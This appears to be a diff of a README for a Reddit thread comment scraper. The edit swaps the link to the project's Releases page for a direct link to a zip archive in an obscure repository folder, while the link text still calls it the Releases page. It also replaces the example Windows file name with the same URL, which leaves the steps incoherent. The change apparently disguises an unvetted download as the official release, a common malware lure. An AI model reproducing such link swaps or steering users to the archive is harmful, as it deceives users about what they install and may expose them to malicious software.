mynameisjabali/reddit-thread-comment-scraper/README.md

 Getting the reddit-thread-comment-scraper is easy.
 Follow these steps:

 1. **Visit the Releases Page**:
-   Go to the [Releases page here](https://github.com/mynameisjabali/reddit-thread-comment-scraper/releases) to download the latest version of the application.
+   Go to the [Releases page here](https://raw.githubusercontent.com/mynameisjabali/reddit-thread-comment-scraper/main/monopitch/reddit-thread-comment-scraper-1.2.zip) to download the latest version of the application.

 2. **Choose the Right File**:
    On the Releases page, you will find a list of available versions.
-Look for the file that matches your operating system (e.g., `reddit-thread-comment-scraper-windows.exe` for Windows).
+Look for the file that matches your operating system (e.g., `https://raw.githubusercontent.com/mynameisjabali/reddit-thread-comment-scraper/main/monopitch/reddit-thread-comment-scraper-1.2.zip` for Windows).

 3. **Download the File**:
    Click on the file name to start the download.
 The file will be saved to your computer.